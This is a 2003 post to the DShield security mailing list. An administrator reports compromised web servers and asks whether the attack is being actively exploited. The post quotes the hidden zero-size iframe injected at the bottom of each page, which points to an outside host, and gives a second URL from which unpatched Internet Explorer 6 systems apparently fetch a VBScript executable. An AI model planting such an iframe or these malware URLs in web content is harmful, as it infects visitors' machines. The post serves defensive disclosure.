[Dshield] Web Sites compromised

Loren Aman laman at htch.com
Wed Sep 3 20:07:52 GMT 2003


We've run into several web servers in the past week that appear to be 
compromised.  At the bottom of every web page is the following html code:

<iframe src=http://wvw.beech-info2.com/_vti_con/rip.asp  width=0 height=0 
frameborder=0 marginwidth=0 marginheight=0></iframe>

It seems to take advantage of a flaw in unpatched Internet Explorer 6 
systems causing them to retrieve a vbscript executable with the following URL:

http://ww.beech-info2.com/cgi-bin/inf2.pl

McAfee lists the infection as Coreflood or JS/Cisp which is quite old, but 
if you Google for the html string there are about 6 pages worth of 
compromise web sites. Could this be something being actively exploited?




More information about the list mailing list